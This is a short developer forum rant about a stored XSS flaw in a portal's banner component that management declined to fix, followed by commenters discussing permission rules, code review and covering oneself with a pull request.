47
netikras
105d

a stored XSS vuln in a banner-like component, visible in ALL the pages in the portal. Anyone can attack anyone.

HOWEVER this was not discovered by 3rd-party security specialists during latest security audit. I have escalated this to my manager and got replied that unless client actively requests this to be fixed should I do anything about it.

FFS.. it's only 2 lines of code.. And there's nothing I can do about it.

Eventualy I was transfered to another project. Now it's not my problem anymore.

Comments
  • 15
    2 lines of code?! Do you have to seek permission for every tiny code change like that?! If so that's madness. I would have just fixed it and notified management afterwards. If I got anything other than a positive response, it would have resulted in one heck of an argument.
  • 6
    @AlmondSauce Yepp, I have to get permission to push those 2 lines :) It's madness, I know...
  • 1
    @AlmondSauce well, it always have to be reviewed without exception (in my last three companies). But in such culture there will always be a buddy around who will do the review in a minute :) I would fix before saying it to management, maybe not even tell them, they start panic maybe..
  • 2
    @rooter Code reviews, sure. But they're generally about making sure the code committed is sensible, follows style guidelines etc. They're not a tool for management to use to decide what features or fixes should be worked on.
  • 1
    Regardless of the team you are now, create the PR, leave on them, cover your ass
Your Job Suck?
Get a Better Job
Add Comment